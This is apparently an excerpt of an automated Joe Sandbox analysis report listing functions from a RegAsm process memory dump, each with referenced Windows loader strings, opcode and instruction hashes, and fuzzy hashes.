                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2986994758
                • Opcode ID: d21b4240628366e46cb12ecbbef5f4d681d24f03b36c77fefd3719ec253b8586
                • Instruction ID: 382477ce1d06eed1cc5ead72e64502fce09a1b30006f9b20783891a1d6836616
                • Opcode Fuzzy Hash: d21b4240628366e46cb12ecbbef5f4d681d24f03b36c77fefd3719ec253b8586
                • Instruction Fuzzy Hash: EEF0C875AC020CABFB14E648DC57FA67769EB44BD4F104459FB007B281D6F0A511CA51
                Function 02F003E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: #%u
                • API String ID: 48624451-232158463
                • Opcode ID: 25ff9cde25158037b44e673e84b5a2caf840ec83a928808961cfe74da560ce57
                • Instruction ID: 674c55a61f26aa4cf9c5fdd520b96954f423f84bf78787a5499fdf0ee625a3e4
                • Opcode Fuzzy Hash: 25ff9cde25158037b44e673e84b5a2caf840ec83a928808961cfe74da560ce57
                • Instruction Fuzzy Hash: DD714D71E0014A9FDB01DFA8C984BAEB7F9BF48784F144069EA05E7291EB34ED41CB60
                Function 02F052A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: @$@
                • API String ID: 0-149943524
                • Opcode ID: a0424cebf83afa61986f3750f0f5ca01a29306a4e108730701cd5841bcf12ee1
                • Instruction ID: 340ca1f29fb4bbe0d134e7fbef3a2d08baef074bd1e5016443aeac6da81d4d68
                • Opcode Fuzzy Hash: a0424cebf83afa61986f3750f0f5ca01a29306a4e108730701cd5841bcf12ee1
                • Instruction Fuzzy Hash: 95329C71A083218BC7248F14C9D4B3EB7E6BF84788F94491EFA9597290E7B4D844EF52
                Function 02FBA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: `$`
                • API String ID: 0-197956300
                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction ID: 632a89edf47327cf27e613c6f4afe2939a23bb0a918dc137e72936b53feae399
                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction Fuzzy Hash: EFC102716043459BD726CF2AC840BABBBE6BFC4398F184A2DFA95CA290D774D505CF41
                Function 02F6E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: Legacy$UEFI
                • API String ID: 2994545307-634100481
                • Opcode ID: ec7abd4771e37b55eeab0ba443a436e6bf300c843473593bd1f1f1ebee46402a
                • Instruction ID: 6d0f87692dddd56e767e0027bf46a6b49b0f4c8f40deb0a3a55c40c1551f57fa
                • Opcode Fuzzy Hash: ec7abd4771e37b55eeab0ba443a436e6bf300c843473593bd1f1f1ebee46402a
                • Instruction Fuzzy Hash: 18615A76E402089FDB24DFA8C984FBEBBB5FB44784F20406DE659EB291D731A900CB50
                Function 02EFA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                Download Yara Rule
                Strings
                • RtlpResUltimateFallbackInfo Exit, xrefs: 02EFA309
                • RtlpResUltimateFallbackInfo Enter, xrefs: 02EFA2FB
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                • API String ID: 0-2876891731
                • Opcode ID: ee152c94e00792e535d412cb8fbecd4a47ab62b1e50cbd243fbd814b7c0a7f45
                • Instruction ID: 81bcf34db14bd8c15c9f209aa52ba81b81bd4015a0b1074e4c5e8f97776cddec
                • Opcode Fuzzy Hash: ee152c94e00792e535d412cb8fbecd4a47ab62b1e50cbd243fbd814b7c0a7f45
                • Instruction Fuzzy Hash: 8741BA34A41A59DBCB25DF69C880BAE77B5EF84348F2481A9EE09DB391E735D900CB40
                Function 02F2329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: .Local\$@
                • API String ID: 0-380025441
                • Opcode ID: f88e0759d7e664abf708992226724b233ef505fe8e7dc7225896b2654424e60c
                • Instruction ID: f4386a3b2c54e3c94f15fee85b01170820e4495d21f3deb3cccf549c17b82949
                • Opcode Fuzzy Hash: f88e0759d7e664abf708992226724b233ef505fe8e7dc7225896b2654424e60c
                • Instruction Fuzzy Hash: B53192B26087149FC311DF28C980A5BBBE8FBC5694F40096EFA9583250DB35DE08CF92
                Function 02EFC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: MUI
                • API String ID: 0-1339004836
                • Opcode ID: 043b2ae09ccda32374511be6d6c53e96b70d4689876ded0c6abe6baab8d53611
                • Instruction ID: 485734a8a5baf3a51fd8520cc2663ad95f29674a401f7836a4b4667a1ff582d2
                • Opcode Fuzzy Hash: 043b2ae09ccda32374511be6d6c53e96b70d4689876ded0c6abe6baab8d53611
                • Instruction Fuzzy Hash: 38825D75E402198FDB64CFA9C8807EDBBB5FF48318F24E16AEA59AB250D7309941CF50
                Function 02EF7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 29dd27036bff02cf21112f248d811a24e5e6ae4f80016210a1ae86bb7359e451
                • Instruction ID: caafbe6d4c0660376f7bd59a8834b25b03ef20bae852d1ed61b78dc09b73bafb
                • Opcode Fuzzy Hash: 29dd27036bff02cf21112f248d811a24e5e6ae4f80016210a1ae86bb7359e451
                • Instruction Fuzzy Hash: 12A14771A48342CFC761DF28C480A6AFBE6BB88344F14996DE6859B350E730E945CB92
                Function 02F2F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: da1deb3a1e7b9a55177cfe209e3650cefc4ae364168f6d6473667d4e83e6731f
                • Instruction ID: fb526118a9008b574c69085e410caa1e96a55507751175140b5769f3a76ce018
                • Opcode Fuzzy Hash: da1deb3a1e7b9a55177cfe209e3650cefc4ae364168f6d6473667d4e83e6731f
                • Instruction Fuzzy Hash: 49411A75D1029CEEDB21CFA9C880AAEBBB8FF49384F10456EE659A7211D7309944CF60
                Function 02F2A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: GlobalTags
                • API String ID: 0-1106856819
                • Opcode ID: 692552b74d366a1637ad0867c223082138534b6a69c22ffd5666551f59315255
                • Instruction ID: 38389137d479858e1afda5f7da59f6bc4d6308c970e82730778a2c29b2ddb666
                • Opcode Fuzzy Hash: 692552b74d366a1637ad0867c223082138534b6a69c22ffd5666551f59315255
                • Instruction Fuzzy Hash: 4A717175E0021ADFDF28CFA9D594AADBBB6FF48784F14812AE606E7240DB359901CF50
                Function 02F7F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                • Instruction ID: 5349414062ffab1289e7243739c4fa55677983cebea898e8b5459018f808e162
                • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                • Instruction Fuzzy Hash: 82518D72614745AFD7229F54CC80F6BB7E9FB84794F040A2ABB8097690D7B4ED04CB92
                Function 02F0E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: EXT-
                • API String ID: 0-1948896318
                • Opcode ID: 34337d81283eae87aac0a62b991e9b24726ddce592f09741ce45ea119816d4fb
                • Instruction ID: 287c6e94baf12725848e0f0892e2ae34d2d39ff98969a78e6448d6a6c524b97c
                • Opcode Fuzzy Hash: 34337d81283eae87aac0a62b991e9b24726ddce592f09741ce45ea119816d4fb
                • Instruction Fuzzy Hash: 1F41B472A083059BD720DA75C980B6BB7D9AF88798F440D2DFB94D71C0E774E904DB92
                Function 02FAB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: PreferredUILanguages
                • API String ID: 0-1884656846
                • Opcode ID: dbbee29b5f6d7065572aa716ba914fbad6deb8e67669cf3dc48f28283624262a
                • Instruction ID: a7de53e8359cd77a22b2f5ad7bbf5dcb12ba36a93e5517fbcb904de9d6d90d4c
                • Opcode Fuzzy Hash: dbbee29b5f6d7065572aa716ba914fbad6deb8e67669cf3dc48f28283624262a
                • Instruction Fuzzy Hash: C141B4B6D0031AABDF11DA94CC60BEEB7B9AF54798F054166EA11F7290D770DE40CBA0
                Function 02F6C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: BinaryHash
                • API String ID: 0-2202222882
                • Opcode ID: 8bd295d83280a795c053805be0dbd2f9d8d92cbe433b2a127e63118cedeeeec7
                • Instruction ID: 8298261e8f2365213ff1ff7d7c0e6fe7fa02a7158690444fa4e7062a40598f23
                • Opcode Fuzzy Hash: 8bd295d83280a795c053805be0dbd2f9d8d92cbe433b2a127e63118cedeeeec7
                • Instruction Fuzzy Hash: B04147B1D0052CAADB21DA60CC88FEEB77DEB44754F0045D6EB48AB140DB709E498FA4
                Function 02F797A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: verifier.dll
                • API String ID: 0-3265496382
                • Opcode ID: 714432ef3cca625479912d9e05d0555ff4226a2735265ee1b2bdf93a57dfdff8
                • Instruction ID: 1d9b37bef41b02430a95e11fc8dae1b457986ab25162acdbcbede6abe8fa3171
                • Opcode Fuzzy Hash: 714432ef3cca625479912d9e05d0555ff4226a2735265ee1b2bdf93a57dfdff8
                • Instruction Fuzzy Hash: 9331A271F40201AFDB259F299850F26B6E6EB48794FD4847AE745DF281E7B18C818B90
                Function 02F9705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: kLsE
                • API String ID: 0-3058123920
                • Opcode ID: 1bf43de30e0f803805ce4e8b3262bc513538a4a6ece8bfa7a9d690fbf63aa2c8
                • Instruction ID: fb80450f9b7b0f2e3d91a475cb28285cefd4947289e675e3fcfd207dbc7e4e20
                • Opcode Fuzzy Hash: 1bf43de30e0f803805ce4e8b3262bc513538a4a6ece8bfa7a9d690fbf63aa2c8
                • Instruction Fuzzy Hash: 0F4135B1DA134C87FF23BB64E844B6ABB99AB50BE8F140919EF508E0D1C7644491CF90
                Function 02F236EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: Flst
                • API String ID: 0-2374792617
                • Opcode ID: 4c8d2ca3fbf209a15d500f982ae0ac876211b0f30fccd1797f6f72bcfb82cd0c
                • Instruction ID: c6ed5827d2fd789ce24b49379b32f7811ee3991552aedcee9b2661e2c0f47fb3
                • Opcode Fuzzy Hash: 4c8d2ca3fbf209a15d500f982ae0ac876211b0f30fccd1797f6f72bcfb82cd0c
                • Instruction Fuzzy Hash: E741CCF1609316DFCB14CF28C484A26FBE4EB4A794F1481AEEA49CF241DB35D946CB91
                Function 02EF5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: Actx
                • API String ID: 0-89312691
                • Opcode ID: 0dfcf1d22ca57df3f2d97e672091eddb58239bcce8ed77c22a34900505797ce1
                • Instruction ID: 9407d9001084939e908ba60f882d23c4f486156068d7472bcf02826128773d80
                • Opcode Fuzzy Hash: 0dfcf1d22ca57df3f2d97e672091eddb58239bcce8ed77c22a34900505797ce1
                • Instruction Fuzzy Hash: D01196307C4A028BD7A44D1D885077672D5EBB635CFB4E52AD752CB750DB71E841C390
                Function 02F7106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: LdrCreateEnclave
                • API String ID: 0-3262589265
                • Opcode ID: 2a6e09cc5f167d756e1077574e47387394e4a17a8746324d71c63fa03bdb5f5e
                • Instruction ID: f680693fe442dfe41bf507478bc9fa0dc7805ca18c1ed21eaf02bc62eae8260a
                • Opcode Fuzzy Hash: 2a6e09cc5f167d756e1077574e47387394e4a17a8746324d71c63fa03bdb5f5e
                • Instruction Fuzzy Hash: A42123B19483449FD710DF5AC805A5BFBE8ABD5B90F004A1FBA989B250D7B1D409CF92
                Function 02F4739A Relevance: .7, Instructions: 705COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8f67d0626c76b29217c46e419dd7494f605d9e45c6373aa357a3c82db64f4bb8
                • Instruction ID: bf71ff7bcc8c35ec2416ee736ea797b982e9bcb53e1671fde22d5df6ebb7309b
                • Opcode Fuzzy Hash: 8f67d0626c76b29217c46e419dd7494f605d9e45c6373aa357a3c82db64f4bb8
                • Instruction Fuzzy Hash: A642A071E006168FDB18DF59C890ABEFBB2FF88394B148559D652AB350DB74E842CF90
                Function 02F1B2C0 Relevance: .6, Instructions: 629COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 53e5c2dd06403e188b4c0d3dd4c1491151f2632dabd4ac0d4e3b989c9133e1bc
                • Instruction ID: 507880bbd0ef3f555d47f1fbd19b18d22a7590228397f2041baedf7b0cec74b8
                • Opcode Fuzzy Hash: 53e5c2dd06403e188b4c0d3dd4c1491151f2632dabd4ac0d4e3b989c9133e1bc
                • Instruction Fuzzy Hash: A032C672E00219DFCF14CFA8C990BAEBBB1FF54798F584069EA05AB390D7359911CB90
                Function 02F88158 Relevance: .6, Instructions: 617COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e849ea6de3dde53cb48b563bf08943368e80262461b24232c72d06779cd72c5c
                • Instruction ID: 068182f893e023f8b82b1904ef117220d29687acc4dd4c67b1c50f25bae60b3e
                • Opcode Fuzzy Hash: e849ea6de3dde53cb48b563bf08943368e80262461b24232c72d06779cd72c5c
                • Instruction Fuzzy Hash: 9C423875E002198FEB24DF69C881BADF7F6BF48384F588099EA49AB241D7349D85CF50
                Function 02F9A118 Relevance: .6, Instructions: 591COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1cb7a81d835f1739906f51053f86ec7b65cf401e9828aa8745695b17699c25c9
                • Instruction ID: c85363b8101d8124058324b4ec4c249dc6db2dfa614c94d675e3f31e47289bb2
                • Opcode Fuzzy Hash: 1cb7a81d835f1739906f51053f86ec7b65cf401e9828aa8745695b17699c25c9
                • Instruction Fuzzy Hash: B622F271B046508FFF25CF29C094772B7F1AF45388F18849ADA968F285E736D492CB61
                Function 02FB16CC Relevance: .6, Instructions: 571COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4c5a3041da1740ab66ea92b52b1fa5117b075cb2faeff2540e38ae1b6180c006
                • Instruction ID: 3280bf46b02e110c7f59ea2b7e386a323ec1c528bc0b19e84e36b5363b735f2c
                • Opcode Fuzzy Hash: 4c5a3041da1740ab66ea92b52b1fa5117b075cb2faeff2540e38ae1b6180c006
                • Instruction Fuzzy Hash: FA229435F002168FDF1ACF5AC4A0AABB7B2BF89354B24856DD659DB344DB30E941CB90
                Function 02EE8397 Relevance: .4, Instructions: 380COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d39f47cb235cd897dce030fe004f9aa0382d7d4f3c17fd1b07fbed905d3f98d0
                • Instruction ID: def0ec8aba00cba84225bdce642b5438b558607d922c53582dce53fe196e3e83
                • Opcode Fuzzy Hash: d39f47cb235cd897dce030fe004f9aa0382d7d4f3c17fd1b07fbed905d3f98d0
                • Instruction Fuzzy Hash: 76D10171A406069BDF14DF64C881BBAB7A6FF44348F058669FA17DB2A1EB70E940CB50
                Function 02EFD7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 960ebf11edc1bd806b333263048baba8c966e0cc9242d0d5b7946970c47775c1
                • Instruction ID: 7c1d8e4cdf567efd0a14f37b4d2da1a7136a831b12d3dacae8e07725dbe1970a
                • Opcode Fuzzy Hash: 960ebf11edc1bd806b333263048baba8c966e0cc9242d0d5b7946970c47775c1
                • Instruction Fuzzy Hash: 7DC1C371E006159BEB29CF58CC40BAEBBB6FF54758F14C269DB15AB280D770E981CB90
                Function 02F78243 Relevance: .3, Instructions: 322COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                • Instruction ID: 06229fb08b29c949ff2bf0f786323cb498838fbf03e0f3ae066cc55e2e5d17bf
                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                • Instruction Fuzzy Hash: B6B15375A00604AFDB24DF95C948EABB7B6FF843C4F10446AAB4297790DB74ED05DB20
                Function 02F190DB Relevance: .3, Instructions: 287COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2defd6f5c7237e71652bd9f7bc3de875c73929df19a1355b00aad5019ff3fc4e
                • Instruction ID: 0cd9741ace4fddf02ad2b9fe7fcde644f4b3bf5c9d3cf0da4cb6dc33a5ff648e
                • Opcode Fuzzy Hash: 2defd6f5c7237e71652bd9f7bc3de875c73929df19a1355b00aad5019ff3fc4e
                • Instruction Fuzzy Hash: BDA16B71901619AFEB26DFA4CC81FAE77B9AF45794F410094FB00AB2A0D7759C51CFA0
                Function 02EF83C0 Relevance: .3, Instructions: 281COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 06eeb2ce0296b270e5762a68e75cd73ef2f7a64798d536cf32e2820128835523
                • Instruction ID: 940851ca11b24780de08d924b3abef86e13b430b5e3924d78df42253962df33d
                • Opcode Fuzzy Hash: 06eeb2ce0296b270e5762a68e75cd73ef2f7a64798d536cf32e2820128835523
                • Instruction Fuzzy Hash: A6C15974608341CFD764CF14C494BABB7E6BF88348F44896DEA898B290D775E908CF92
                Function 02F30185 Relevance: .3, Instructions: 276COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cc5a0c09932fd8a3724fc4bdd4c2ace5af48f8fe32b34ede7859c1c3e42426d0
                • Instruction ID: 6ba9e0c596613f83411004bee1132a8ef8490e341161dc7c1f376cb7ee7f1f2a
                • Opcode Fuzzy Hash: cc5a0c09932fd8a3724fc4bdd4c2ace5af48f8fe32b34ede7859c1c3e42426d0
                • Instruction Fuzzy Hash: 7BA1AF71B0071A9BDB26CF65C990BBAB7B5FF44394F10402EEB4597281EB74E911CB50
                Function 02F760E0 Relevance: .3, Instructions: 264COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 08de3d96038c3432a6b21428acf22172b430f65532bf6d8dfc47687fe145f2ab
                • Instruction ID: 2345cc978aa3666241c3dd89722fd2ab6b8b34ef8911438e38f9e16ec33095b0
                • Opcode Fuzzy Hash: 08de3d96038c3432a6b21428acf22172b430f65532bf6d8dfc47687fe145f2ab
                • Instruction Fuzzy Hash: 87919171E00619AFDF15CF68D884BAEBBB9AB48784F15415AE710EB341D774D900DFA0
                Function 02F0E3F0 Relevance: .3, Instructions: 261COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f10d8389369ecd7206fe964fdc6e7d47fcca0e1ad7a3b130697f29cc01c425ef
                • Instruction ID: 15dc61f386f3e67837f25ef5860c322470d05cb3dfe2b2b60a6a30cd24ef2864
                • Opcode Fuzzy Hash: f10d8389369ecd7206fe964fdc6e7d47fcca0e1ad7a3b130697f29cc01c425ef
                • Instruction Fuzzy Hash: 9C911276E00625CBDB289B18C984B7EB7A2EF88794F044865EF05DB3C0E734D801DBA1
                Function 02EF1131 Relevance: .3, Instructions: 259COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3df14ad96d7c39c1732c44c289690f09bf88f241a5e394fa160d5e09682a4c9d
                • Instruction ID: df74c8d32d45e2fbd41215bcd32812ea555928a5fd89bb311afa64b54641ba2c
                • Opcode Fuzzy Hash: 3df14ad96d7c39c1732c44c289690f09bf88f241a5e394fa160d5e09682a4c9d
